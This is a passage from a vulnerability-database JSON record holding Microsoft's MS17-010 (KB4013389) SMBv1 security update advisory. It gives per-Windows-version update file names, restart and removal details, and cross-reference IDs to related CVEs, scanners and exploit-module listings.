href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T17:40:20", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.microsoft.com/en-us/help/4013389/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-01-01T22:39:28", "history": [{"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>indows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "enchantments": {"dependencies": {"modified": "2019-09-11T12:33:22", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4012598"], "type": "mskb"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", 